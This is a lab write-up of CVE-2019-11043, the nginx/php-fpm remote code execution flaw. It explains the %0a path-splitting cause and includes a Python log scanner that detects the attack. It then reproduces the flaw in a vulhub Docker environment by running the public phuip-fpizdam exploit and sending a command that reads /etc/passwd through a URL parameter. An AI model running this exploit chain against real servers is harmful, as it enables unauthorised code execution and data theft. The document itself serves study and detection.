
CVE-2019-11043 (PHP Remote Code Execution Vulnerability)

Vulnerability Principle

When nginx's fastcgi_split_path_info directive processes a request path that contains %0a, its regular expression fails on the decoded newline character (\n) and PATH_INFO is left empty. php-fpm has a logic flaw in its handling of an empty PATH_INFO, and an attacker who carefully constructs a request can exploit it to achieve remote code execution. The vulnerability is only triggered when nginx.conf contains a specific configuration, shown below:

location ~ [^/]\.php(/|$) {
    ...
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_pass   php:9000;
    ...
}

An attacker can use a newline character (%0a) to break the match of the regular expression in the fastcgi_split_path_info directive. The failed match leaves PATH_INFO empty, which triggers the vulnerability.
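To show why the newline empties PATH_INFO, and to give a defender a way to spot such requests in nginx access logs, here is an added Python example (not code from the original post or from the phuip-fpizdam project). It models the page's fastcgi_split_path_info regex with Python's re module, whose '.' and '$' behave like PCRE's defaults here; the log lines and IP addresses are constructed, and the nginx combined log format is assumed.

```python
import re
from urllib.parse import unquote

# The regex from the vulnerable nginx directive quoted above:
#   fastcgi_split_path_info ^(.+?\.php)(/.*)$;
# As in PCRE, '.' does not match "\n" and '$' matches only at the end of
# the string (or just before a single trailing "\n").
SPLIT_RE = re.compile(r"^(.+?\.php)(/.*)$")

def split_path_info(path):
    """Model fastcgi_split_path_info: return (fastcgi_script_name, fastcgi_path_info).
    When the regex does not match, nginx leaves $fastcgi_path_info empty,
    which is the empty PATH_INFO that php-fpm mishandles."""
    m = SPLIT_RE.match(path)
    if m is None:
        return path, ""
    return m.group(1), m.group(2)

# nginx "combined" log format (assumed); the sample below is constructed
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def is_suspicious_uri(raw_uri):
    """True when the decoded path carries a newline after a .php component,
    the shape that empties PATH_INFO. No legitimate URL path looks like this."""
    path = unquote(raw_uri.split("?", 1)[0])
    return re.search(r"\.php/[^\n]*\n", path) is not None

def scan_access_log(lines):
    """Return (client_ip, raw_uri, status, modelled PATH_INFO) for each hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None or not is_suspicious_uri(m.group("uri")):
            continue
        path = unquote(m.group("uri").split("?", 1)[0])
        hits.append((m.group("ip"), m.group("uri"), int(m.group("status")), split_path_info(path)[1]))
    return hits

SAMPLE_LOG = [  # constructed lines; the 10.0.0.x addresses are placeholders
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /index.php/info HTTP/1.1" 200 512 "-" "curl/7.88"',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /index.php/abc%0Adef HTTP/1.1" 200 77 "-" "Go-http-client/1.1"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)  # only the third line is reported, with modelled PATH_INFO ""
```

Note the edge case the model reproduces: a single newline at the very end of the path still matches, because '$' accepts a position just before a final newline, so only a newline followed by more characters empties PATH_INFO. Fixed php-fpm releases (7.1.33, 7.2.24 and 7.3.11) remove the underlying flaw regardless of the nginx configuration.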

Vulnerability Reproduction

The environment for this experiment is a Kali machine running the Docker image provided by vulhub. First install vulhub, then change into the directory for this vulnerability and build and start the container with:

docker-compose build
docker-compose up -d

Use docker-compose config to view the configuration of the vulnerable environment.
Next, access the page:
192.168.19.128:8080 (192.168.19.128 is the IP of the Kali virtual machine)
Download the publicly available proof-of-concept tool from GitHub:

git clone https://github.com/neex/phuip-fpizdam.git

This tool is written in Go and must be compiled and run in a Go environment, so Go has to be installed on Kali.
After entering the cloned directory, execute:

go env -w GOPROXY=https://goproxy.cn
go get -v && go build

The tool is now built.
Next, reproduce the vulnerability by executing the following command in the same directory:

go run . "http://192.168.19.128:8080/index.php"

Afterwards, commands can be passed in the parameter a on the page http://192.168.19.128:8080. For example, to view the contents of the /etc/passwd file, construct the following request:
http://192.168.19.128:8080/?a=cat%20/etc/passwd

The vulnerability has been successfully reproduced.

Installing the Go environment on Kali is covered at this link:
https://blog.csdn.net/WHQ556677/article/details/122283509
